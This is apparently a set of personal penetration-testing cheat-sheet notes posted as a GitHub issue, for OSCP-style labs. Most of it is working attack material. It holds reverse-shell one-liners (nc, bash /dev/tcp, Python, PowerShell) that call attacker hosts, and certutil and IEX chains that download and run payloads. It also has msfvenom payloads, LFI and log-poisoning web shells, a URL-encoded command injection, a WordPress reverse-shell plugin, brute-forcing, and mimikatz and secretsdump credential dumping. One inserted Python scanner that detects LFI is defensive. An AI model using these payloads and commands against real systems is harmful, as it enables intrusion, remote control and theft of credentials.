Open WDavid404 opened 9 months ago
sudo env "PATH=$PATH" autorecon 192.168.195.248
(meanwhile, try "rustscan -a <IP> -- -sV -A")
see the nmap port report and look for:
- OS info
- host info
- domain info (e.g. in http-title)
- service version info
SNMP (udp 161)
snmpwalk -v 2c -c public 192.168.190.149 NET-SNMP-EXTEND-MIB::nsExtendOutputFull
snmpbulkwalk -c public -v2c 192.168.182.149 . --> contains more information than autorecon's output, e.g. passwords
ftp via anonymous login
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.220 1234 > /tmp/f
"web-control" file: nc -e /bin/sh 192.168.45.220 1235
smb
--> find share folders or user list enum4linux -a target_ip
smbmap -H <URL or IP> // show the share list as anonymous user (e.g. smbmap -u jsmith -p password1 -d workgroup -H 192.168.0.1)
smbclient //active.htb/Replication (access a share dir as anonymous user)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.220 1234 > /tmp/f
web-control: nc -e /bin/sh 192.168.45.220 1235
53/port dns:
dig axfr <domain> @<DNS_IP>
google for exploit
access the web service via browser
wpscan --url http://xxxxxx -e u,t,p
check /robots.txt
sometimes we need to bypass a user-agent restriction (e.g. only search engines may access robots.txt):
curl --user-agent "Google/1.0" <IP>:<port>/robots.txt
feroxbuster/gobuster/ffuf for http service
subdomain brute force:
ffuf -c -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt -u http://devvortex.htb/ -H "Host: FUZZ.devvortex.htb" -fw 5338 | grep --color=auto 200
--> after finding one, edit /etc/hosts and add the subdomain on the same line as the domain
search for zip, backup files: feroxbuster -u https://oscp.example.com:8443 -k -C 404 -x zip -B
or, try hydra
hydra -l gaara -P /usr/share/wordlists/rockyou.txt ssh://192.168.163.142:22
- exiftool -a -u PDF_NAME.pdf
- exiftool xxxx.jpg
- steghide extract -sf filename.jpg
hydra -L user -P /usr/share/wordlists/rockyou.txt ssh://$IP -V
hydra -L user -P user ssh://$IP -V -u (check if user and password are same)
hydra -L user -P user ssh://$IP -V
or when you don't have user info
nmap -p 22 --script ssh-brute.nse <target> -vvv
Try
impacket-GetUserSPNs -request -dc-ip <domain url or ip> <domain host name> (request as anonymous user)
e.g. GetNPUsers.py htb.local/ -dc-ip forest.htb -request
impacket-GetUserSPNs -request -dc-ip 172.16.214.10 MEDTECH.com/leon (PWD: rabbit:))
--> get the administrator hash
john --wordlist=/usr/share/wordlists/rockyou.txt admin.txt (to crack the hash)
impacket-psexec <domain>/administrator:"<password>"@192.168.246.189
impacket-psexec -hashes 000000000000000000000000000000000:8d7a47a6f9f66b97b1bae4178747494 joe@172.16.206.11
netexec <target(s)> -u username -p password --continue-on-success
netexec <target(s)> -u username -p password --local-auth
netexec <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords
# -just-dc: Extract only NTDS.DIT (NTLM hashes and kerberos keys).
impacket-secretsdump -just-dc example.local/username:password@<target-ip>
# -just-dc-ntlm: Extract only NTDS.DIT data (NTLM hashes only).
impacket-secretsdump -just-dc-ntlm example.local/username:password@<target-ip>
one example: https://daemonexala.medium.com/hack-the-box-forest-without-metasploit-tjnulls-list-for-oscp-3260e035a4bd
RCE exploit
upload a file via FTP or the web page ---> in some cases we cannot upload an .aspx file; instead we can upload a web.config file, which can execute code. Craft a web.config file with the sample code as below, and put in code that downloads and executes a PowerShell script hosted on our own HTTP server.
LFI
try:
../../../../../../../../../etc/passwd
../../../../var/log/apache2/access.log
e.g.
192.168.224.80/console/file.php?cmd=whoami
(
other cases:
$IP:8593/index.php?book=../../../var/log/apache2/access.log&cmd=id
$IP:8593/index.php?book=../../../var/log/apache2/access.log&&cmd=id
$IP:8593/index.php?book=../../../var/log/apache2/access.log?cmd=id
$IP:8593/index.php?book=../../../var/log/apache2/access.log;cmd=id
)
http://192.168.224.80/console/file.php?file=/etc/passwd
http://192.168.167.80/console/file.php?file=/var/log/auth.log&cmd=id
curl "http://192.168.167.80/console/file.php?file=/var/log/auth.log&cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.45.204%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22sh%22)%27"
e.g. if we have a file.php URL, we can fuzz the parameter name:
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -u http://192.168.210.80/console/file.php?FUZZ= -t 100 -fs 0
OR
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -u http://192.168.210.80/console/file.php?FUZZ -t 100 -fs 0
OR
ffuf -w /usr/share/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://$IP/secret/evil.php?FUZZ=/etc/passwd -fs 0
OR
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -u http://192.168.210.80/console/file.php?FUZZ=../../../../../../../../../../etc/passwd -t 100 -fs 0
php://filter/convert.base64-encode/resource=../../../../../../../../etc/passwd
http://localhost/include.php?page=php://filter/convert.base64-encode/resource=secret.inc
http://localhost/include.php?page=php://filter/read=convert.base64-encode/resource=secret.inc
http://localhost/include.php?page=php://filter/resource=/etc/passwd
- cron job on web page
- SQL injection
- log poisoning
nc -nv <ip> 22 (port 22 --> SSH auth log poisoning)
anyword/<?php system($_GET['cmd']); ?>
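From the defender's side, the LFI, php://filter and log-poisoning requests listed above all leave recognisable traces in the web server's access log. The following is an added example (not from the original note) that decodes each request and flags those indicators; the log lines are constructed in Apache combined format and the parameter names treated as command parameters are an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache "combined" log format; not taken from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /console/file.php?file=/etc/passwd HTTP/1.1" 200 1843 "-" "curl/7.88"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /include.php?page=php://filter/convert.base64-encode/resource=secret.inc HTTP/1.1" 200 512 "-" "curl/7.88"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?book=..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Faccess.log&cmd=id HTTP/1.1" 200 77 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 77 "-" "<?php system($_GET['cmd']); ?>"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

TRAVERSAL_RE = re.compile(r'\.\.[/\\]')
# PHP stream wrappers used for LFI plus remote URLs (RFI) in a parameter value
WRAPPER_RE = re.compile(r'^(php|data|expect|phar|file|https?|ftp)://', re.I)
SENSITIVE_RE = re.compile(
    r'(etc/passwd|etc/shadow|var/log/|proc/self|\.ssh/id_rsa|\.bash_history)', re.I)
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.I)
CMD_PARAMS = {"cmd", "c", "exec", "command"}  # assumed names; tune to the application


def decode(value: str) -> str:
    """URL-decode twice so double-encoded traversal (%252e%252e%252f) is also caught."""
    return unquote(unquote(value))


def classify(target: str, user_agent: str) -> list[str]:
    """Return the LFI / log-poisoning indicators found in one request (empty list if none)."""
    reasons = []
    parts = urlsplit(target)
    path = decode(parts.path)
    params = [(k, decode(v)) for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    values = [path] + [v for _, v in params]
    if any(TRAVERSAL_RE.search(v) for v in values):
        reasons.append("path traversal")
    if any(WRAPPER_RE.match(v) for _, v in params):
        reasons.append("stream wrapper or remote URL in parameter")
    if any(SENSITIVE_RE.search(v) for v in values):
        reasons.append("sensitive file path")
    if any(k.lower() in CMD_PARAMS for k, _ in params):
        reasons.append("command parameter")
    if PHP_TAG_RE.search(decode(user_agent)):
        reasons.append("php code in user-agent (log poisoning)")
    return reasons


def scan_log(text: str) -> list[dict]:
    """Parse combined-format log lines and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real pipeline would count and report these
        reasons = classify(m["target"], m["ua"])
        if reasons:
            findings.append({"ip": m["ip"], "target": m["target"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["target"], "->", ", ".join(f["reasons"]))
```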
3306/port mysql
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.226.118
=============================
# PE phase
## both for linux and windows
check wp-config.php file (/var/www/html)
e.g. `cat wp-config.php | grep DB`
## PE for Active Directory
mimikatz tool
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
.\mimikatz.exe "token::elevate" "lsadump::sam" "exit"
// dcsync
mimikatz # lsadump::dcsync /user:corp\Administrator
mimikatz # lsadump::dcsync /user:corp\
check history
`cat C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt`
credential info in registry, etc
(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -ErrorAction SilentlyContinue).DefaultUserName
(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -ErrorAction SilentlyContinue).DefaultPassword
we can also look for the SAM and SYSTEM files under the windows/system32 folder
then crack them --> `impacket-secretsdump -sam SAM -system SYSTEM LOCAL`
check whether the credentials are usable for lateral movement:
`netexec winrm 10.10.167.140-142 -u 'tom_admin' -H '4979d69d4ca66955c075c41cf45f24dc'`
login via winrm
`evil-winrm -H 4979d69d4ca66955c075c41cf45f24dc -u tom_admin -i 10.10.167.140`
login to MSSQL server:
`impacket-mssqlclient oscp.exam/sql_svc:Dolphin1@10.10.209.148 -windows-auth`
## PE for linux standalone
auto enum tool
`linpeas -a`
manual enum check
sudo -l (check what commands current user can run with sudo privilege)
cat /etc/passwd | grep bash (users with a login shell)
cat /etc/crontab (cronjobs running)
ls -al /etc/cron
cat .bash_history (passwords saved in history)
env (passwords saved in environment variable)
uname -ar (kernel exploits)
cat /etc/*-release (kernel exploits)
ss -tulnp (check for any potential services running) ---> then curl 127.0.0.1:<port>
getcap -r / 2>/dev/null (capabilities)
find / -perm -u=s -type f 2>/dev/null (SUID)
find / -perm -g=s -type f 2>/dev/null (SGID)
sudo --version (public exploits)
id (check for docker and lxd group)
ls -la /etc/passwd (writable /etc/passwd)
ls -la /etc/shadow (writeable /etc/shadow)
ps aux | grep -i "root" --color=auto
find / -name cronlog 2>/dev/null ----- check cron job log info
find / -writable 2>/dev/null
find / -perm -o+w -type f 2>/dev/null | grep /proc -v --- world-writable files, excluding /proc
cd /home; grep -rnH "password" .
cd /var/www/; grep -rnH "password" .
find . -type f -exec ls -lsha {} + | grep -E -i '.secret|secret|token|key|api|password|user'
find .dat files that contain the string SHA: find /opt/ofbiz/runtime/data/derby/ofbiz/seg0 -type f -name "*.dat" -exec grep "SHA" {} \;
check if credentials stored in .bash_history find /home -name .bash_history -exec cat {} \;
recursively grep all directories and subdirectories: grep -rnH "password" .
cat C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
try su to switch user to root: `su root`, `su`
try pspy64
## PE for windows standalone
whoami /priv
winpeas ---> find backup (.zip) files
credential info in registry, etc
(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -ErrorAction SilentlyContinue).DefaultUserName
(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -ErrorAction SilentlyContinue).DefaultPassword
interesting service
we can also look for the SAM and SYSTEM files under the windows/system32 folder
then crack them on kali --> `impacket-secretsdump -sam SAM -system SYSTEM LOCAL`
https://github.com/WDavid404/Note_tryhackme/issues/2
nmap -p- -T5 <ip> -v #-p- to scan ports from 1 through 65535
# then,
nmap -p 22,25,80 -A <ip> -v
sudo nmap -sC -sV -oN mailsrv1/nmap 192.168.50.242
sudo nmap -p- -sV -T5 192.168.202.52 // T5 sometimes misses results; in that case retry with T4 or lower
nmap -p 22,80,443 -A
nc -vz 192.168.135.19 1-65535 2>&1 | grep succeeded
nc -vz 192.168.135.19 22 2>&1 | grep succeeded
sudo proxychains -q nmap -sT -oN nmap_servers -Pn -p 21,80,443 172.16.6.240 172.16.6.241 172.16.6.254
wget https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb
dpkg -i rustscan_2.0.1_amd64.deb
rustscan -a 10.10.216.174 --ulimit 5000 -- -sV -A -oN rustscan.txt
$python -m SimpleHTTPServer 9000
$python3 -m http.server 9000
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")' ---> to get a /bin/bash shell
// after getting a tty, run the following:
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH
export TERM=xterm-256color
export SHELL=bash
alias ll='clear; ls -lsaht --color=auto'
ctrl + z
stty raw -echo; fg; reset // after this, pressing ctrl+c no longer disconnects the current session
stty rows 200 columns 200
Explanation:
This shell sucked so I ran the following command to upgrade it to a more stable one:
/usr/bin/script -qc /bin/bash /dev/null
Looking into the PATH environment variable, we can see that the path is set to the current user's home directory, due to which it is not able to find the binary of the command.
we can do
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
https://www.revshells.com/
https://highon.coffee/blog/reverse-shell-cheat-sheet/
Linux shell
#! /bin/bash
bash -i >& /dev/tcp/192.168.121.100/4444 0>&1
In a remote context (especially when executing through an injection), try:
bash -c 'bash -i >& /dev/tcp/192.168.121.100/4444 0>&1'
or try
bash 'bash -i >& /dev/tcp/192.168.121.100/4444 0>&1'
Another approach: try saving your reverse shell command into a file, then use the query to download it with wget and just run it. Use port 443 for the reverse shell and 80 for the local HTTP server.
on Windows PC
c:\tools\nc64.exe -e cmd.exe 10.10.187.189 4444
certutil -urlcache -f http://192.168.45.211/nc64.exe c:/windows/temp/nc64.exe;
c:/windows/temp/nc64.exe -e cmd.exe 192.168.45.211 4444
msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe // service executable
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.8.50 LPORT=4444 -f exe -o rev.exe // plain exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.232.37 LPORT=443 -f hta-psh -o thm.hta
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.4 LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.50.4 LPORT=443 -f python -b "\x00\x0a" -v shellcode
Note: -v sets the name of the output variable (default is buf)
Because msfvenom is used with a meterpreter payload, the receiving side must use msfconsole (not nc)
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <KALI_IP>;set LPORT <PORT>;run;"
After receiving the reverse shell, type shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.184 LPORT=5555 -f dll -o EnterpriseServiceOptional.dll
Lesson learned: without -f, the dll is generated but does not actually work
On the target machine
nc -e /bin/sh 10.0.0.1 4242
nc -e /bin/bash 10.0.0.1 4242
nc -c bash 10.0.0.1 4242
C:\Windows\Temp\nc.exe -e cmd.exe 192.168.118.4 4446
//linux
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.36 3333 >/tmp/f
//linux + python3
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",attackerport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
On NC receiver side
nc -lvnp 4444
Use case: payload for RCE
(e.g.
python3 49488.py -u mark@relia.com -p OathDeeplyReprieve91 -i 'http://web02.relia.com:14080' -c powershell.exe -a '-e JABjAGwAaQBlAG4A....'
)
one-liner command payload
$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Note when encoding: when the target is Windows, choose CRLF line endings
Base64 encode online: https://www.base64encode.org/
powershell -e base64_payload
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.45.243',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Non-staged:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.243 LPORT=443 -f exe -o met.exe
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
paired with: nc -vlp 443
Staged:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.45.223 LPORT=4445 -f exe -o met.exe
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
kali@kali:~/beyond$ sudo msfconsole -q
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.45.204
LHOST => 192.168.45.243
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > set ExitOnSession false --> the listener stays active for new sessions without needing a restart for every incoming session
ExitOnSession => false
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
for linux
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.180/4445 0>&1'");?>
other reference: http://pentestmonkey.net/tools/php-reverse-shell
xfreerdp /u:offsec /p:lab /w:1200 /h:800 +fonts +clipboard /v:192.168.223.250 /drive:.,kali-share /cert-ignore
xfreerdp /d:za.tryhackme.com /u:'user.name' /p:'qwertqwertqwert123!!' /v:192.168.186.62 /w:800 /h:700 /drive:.,kali-share +clipboard
// xfreerdp command example (full screen)
xfreerdp /u:tsutomu-nakamura /p:qwertqwertqwert123\!\! /f +fonts +clipboard /v:192.168.1.103:3389 /drive:.,kali-share
// xfreerdp command example (with resolution specified)
xfreerdp /u:tsutomu-nakamura /p:password /w:800 /h:500 +fonts +clipboard /v:192.168.1.103:3389 /drive:.,kali-share
//with domain
kali@kali:~$ xfreerdp /u:stephanie /d:corp.com /v:192.168.50.75 /w:800 /h:500 /drive:.,kali-share
//using hash instead of password
xfreerdp /v:192.168.0.1 /u:username /pth:
To exit from full-screen: CTRL-ALT-ENTER
evil-winrm -i MACHINE_IP -u thmuser1 -p Password321
evil-winrm -i 192.168.50.220 -u daveadmin -p "qwertqwertqwert123\!\!" -P 5985
Download file
*Evil-WinRM* PS C:\Users\hacker\Documents> download <file path in the target host > <kali local path>
*Evil-WinRM* PS C:\users\wario\Desktop> download local.txt .
--> downloads local.txt to the current directory on kali (i.e. the directory Evil-WinRM was started from)
Upload file:
*Evil-WinRM* PS C:\Users\hacker\Documents> upload <file path in kali> <the target host's path>
*Evil-WinRM* PS C:\users\wario\Desktop> upload test.txt .
--> uploads test.txt from the directory Evil-WinRM was started from on kali to the target machine
https://eng-entrance.com/linux-command-ftp
Login:
Upload: ftp > put <filename>
Download: get <filename>
Upload multiple files: mput <filename>
Download multiple files: mget <filename> (mget *.jpg) --> note: hidden files (e.g. .@admins) must be downloaded separately with get
mkdir: create a directory
delete: delete a file
chmod: change file permissions
wget -r ftp://user:pass@server.com/
## anonymous case
wget -r ftp://anonymous:@192.168.218.157/backup
ls -al /usr/share/nmap/scripts|grep ftp
--> list all script for ftp
sudo nmap -sS -p21 --script ftp-brute 192.168.172.144
sudo nmap -sS -vv -p25 192.168.216.1-200 -oG nmap_out2
grep open nmap_out2|cut -d" " -f2 > list_smb
for ip in $(cat list.txt); do host $ip.megacorpone.com; done
for ip in $(seq 1 254); do echo 192.168.50.$ip; done > ips
Use nc to find which IPs in the subnet have port 445 open
for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; done
The -z flag to check for a listening port without sending data, -v for verbosity, and -w set to 1 to ensure a lower time-out threshold.
(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell
Use its URL-encoded form in the curl request, as follows:
kali@kali:~$ curl -X POST --data 'Archive=git%3B(dir%202%3E%261%20*%60%7Cecho%20CMD)%3B%26%3C%23%20rem%20%23%3Eecho%20PowerShell' http://192.168.50.189:8000/archive
kali@kali:~$ cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
kali@kali:~$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Use the URL-encoded form of the following command
IEX (New-Object System.Net.Webclient).DownloadString("http://192.168.119.3/powercat.ps1");powercat -c 192.168.119.3 -p 4444 -e powershell
So the final request is:
kali@kali:~$ curl -X POST --data 'Archive=git%3BIEX%20(New-Object%20System.Net.Webclient).DownloadString(%22http%3A%2F%2F192.168.119.3%2Fpowercat.ps1%22)%3Bpowercat%20-c%20192.168.119.3%20-p%204444%20-e%20powershell' http://192.168.50.189:8000/archive
https://discord.com/channels/780824470113615893/1148907181480104028
On the Kali machine:
Install: apt install python3-impacket
Use: impacket-smbserver shareName sharePath -smb2support
(e.g. impacket-smbserver smb_wei . -smb2support)
On the Windows PC
Connect: C:\>net use \\192.168.45.159\smb_wei
Copy a file:
C:\WINDOWS\Temp>copy .\Desktop\ticket.doc \\192.168.45.159\smb_wei\ticket.doc
1 file(s) copied.
Connecting to an SMB share
smbclient -U "DOMAIN\user" //server/example
e.g.
smbclient //192.168.223.248/Users --user=relia.com/offsec%lab
smbclient //192.168.194.10/offsec
--> when there is no username and password, just press Enter
Using xfreerdp: On Kali: xfreerdp /cert-ignore /compression /auto-reconnect /u:offsec /p:lab /v:192.168.212.250 /w:1600 /h:800 /drive:test,/home/kali/Documents/pen-200
On windows:
copy mimikatz.log \\tsclient\test\mimikatz.log
--> "tsclient" appears in the Network folder
https://github.com/WDavid404/OSCP/issues/12#issuecomment-1875504860
On your machine
nc -nlvp 4433 > <filename>
On Target
nc -nv 192.168.45.xx 4433 < <filename>
[On Kali] scp stuart@192.168.x.144:/opt/backup/sitebackup3.zip .
python3 -m http.server 80
[Windows] PS C:\Users\dave> iwr -uri http://192.168.45.244/winPEASx64.exe -Outfile winPEAS.exe
curl -o winPEAS.exe http://192.168.194.10/winPEAS.exe
smbclient //192.168.50.195/share -c 'put config.Library-ms'
then enter the password on kali
Run powershell wget on Windows
powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe
Use the certutil tool on the Windows PC (used in the SQL injection exercise)
certutil -urlcache -f http://192.168.45.211/nc64.exe c:/windows/temp/nc64.exe;
c:/windows/temp/nc64.exe -e cmd.exe 192.168.45.211 4444
https://www.geeksforgeeks.org/smb-enumeration/
smbclient -L <target IP>
kali@kali:~$ smbclient -p 4455 -L //192.168.50.63/ -U hr_admin --password=Welcome1234
kali@kali:~$ smbclient -p 4455 //192.168.50.63/scripts -U hr_admin --password=Welcome1234
enum4linux -U <target IP>
smbmap -u jsmith -p password1 -d workgroup -H 192.168.0.1
crackmapexec smb 192.168.50.242 -u john -p "dqsTwTpZPn#nL" --shares
==> to list the SMB shares and their permissions on MAILSRV1 (192.168.50.242)
// access the TEMP share: smbclient //172.16.208.11/TEMP --user=MEDTECH.COM/joe%Flowers1
// upload mimikatz to the TEMP share: smbclient //172.16.208.11/TEMP -c 'put mimikatz.exe' --user=MEDTECH.COM/joe%Flowers1
// download all files in the transfer share directly to local: smbclient '//192.168.213.248/transfer' -N -c 'prompt OFF;recurse ON;mget '
usage:
feroxbuster -u http://192.168.236.249 -x html -x php -x aspx
feroxbuster -u http://192.168.172.144 -w /usr/share/wordlists/dirb/common.txt -t 20 -x zip,html,php
https://github.com/ffuf/ffuf Installation: git clone https://github.com/ffuf/ffuf ; cd ffuf ; go get ; go build
Usage:
ffuf -w /path/to/wordlist -u https://target/FUZZ
// the keywords W1 and W2 can be fuzzed in combination
kali@kali$ ffuf -u https://W2/W1 -w ./wordlist.txt:W1,./domains.txt:W2
//recursion
ffuf -u http://example.com/FUZZ -w /path/to/wordlist -recursion
//-e to specify extensions
ffuf -e .php,.zip,.bak -u http://example.com/FUZZ -w /path/to/wordlist
kali@kali$ ffuf -w /path/to/paramnames.txt -u https://target/script.php?FUZZ=test_value -fs 4242
kali@kali$ ffuf -w /path/to/vhost/wordlist -u https://target -H "Host: FUZZ" -fs 4242
Reference:
https://jpn.nec.com/cybersecurity/blog/210604/index.html
Examples:
ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://$IP/FUZZ
ffuf -c -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt -u http://devvortex.htb/ -H "Host: FUZZ.devvortex.htb" -fw 5338 | grep --color=auto 200
Note: when found a sub-domain,don't forget to add sub-domain info to /etc/hosts
Gobuster supports different enumeration modes, including fuzzing and dns.
e.g.
kali@kali:~/beyond$ gobuster dir -u http://192.168.50.242 -w /usr/share/wordlists/dirb/common.txt -o mailsrv1/gobuster -x txt,pdf,config
Use dir mode, which enumerates files and directories.
gobuster dir -u 192.168.50.20 -w /usr/share/wordlists/dirb/common.txt -t 5
Gobuster to search pdf files on a target web site
gobuster dir -u 192.168.194.197 -w /usr/share/wordlists/dirb/common.txt -t 5 -x .pdf
HP: https://github.com/OJ/gobuster
space: %20 or a plus (+) sign; . : %2E; / : %2F
Note: this page is handy for URL encoding: https://meyerweb.com/eric/tools/dencoder/
https://whitemarkn.com/learning-ethical-hacker/wpscan/
wpscan --url http://xxxxxx -e u,t,p
wpscan --url www.yahoo.co.jp
wpscan --url 192.168.194.16
wpscan --url http(s)://www.yoursiteurl.com --enumerate ap # enumerate all plugins
wpscan --url http(s)://www.yoursiteurl.com --enumerate vp # only display vulnerable plugins
wpscan --url http(s)://www.yoursiteurl.com -e u # enumerate users
wpscan --url http://alvida-eatery.org --passwords /usr/share/wordlists/rockyou.txt --usernames admin
wpscan --url http://alvida-eatery.org -e u,ap --api-token=<API_TOKEN> # with an API token wpscan reports many more issues
wpscan --url http://192.168.50.244 --enumerate p --plugins-detection aggressive -o websrv1/wpscan
==> find vulnerabilities in plugins and themes
https://sevenlayers.com/index.php/179-wordpress-plugin-reverse-shell
<?php
/**
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.86.xx/443 0>&1'"); ?>
2. zip the file: `zip reversh-plugin.zip ./reversh-plugin.php`
3. upload it as a WordPress plugin and activate it (meanwhile, on the attack machine use nc to catch the reverse shell)
recursively grep all directories and subdirectories:
grep -rnH "password" .
-rnH: These are options or flags used with the grep command:
-r (or --recursive): Searches recursively through directories and their subdirectories for the specified pattern.
-n (or --line-number): Displays the line numbers along with the lines that contain the matched pattern.
-H (or --with-filename): Displays the file name where the match is found along with the matching line.
find / -type f -name flag* 2>/dev/null
case: narrow down which .dat files had “SHA” string in them for a hash:
-->
find /opt/ofbiz/runtime/data/derby/ofbiz/seg0 -type f -name "*.dat" -exec grep "SHA" {} \;
Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Send an email
sudo swaks -t dave.wizard@supermagicorg.com --from test@supermagicorg.com -ap --attach config.Library-ms --server 192.168.208.199 --body body.txt --header "Subject: Problems" --suppress-data
update exploitdb package: sudo apt update && sudo apt install exploitdb
The above command updates the local copy of the Exploit Database archive under /usr/share/exploitdb/.
searchsploit remote smb microsoft windows
On Attack machine
$ gcc ofs.c -o ofs # target machine is Linux OS
$ python3 -m http.server 9000
On target machine
$ cd /tmp/
$ wget <IP>:9000/ofs
$ chmod +x ofs
$ ./ofs
This missing symbol usually means your kali glibc is newer than the target machine's.
If you can compile it on the target machine it will usually work;
otherwise you can try compiling it with static libraries, i.e. gcc -static your_program.c -o your_program
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
kali@kali:~/passwordattacks$ chmod 600 id_rsa
kali@kali:~/passwordattacks$ ssh -i id_rsa -p 2222 dave@192.168.50.201
sudo ssh -i tom_key -oHostKeyAlgorithms=+ssh-dss tom@192.168.227.107
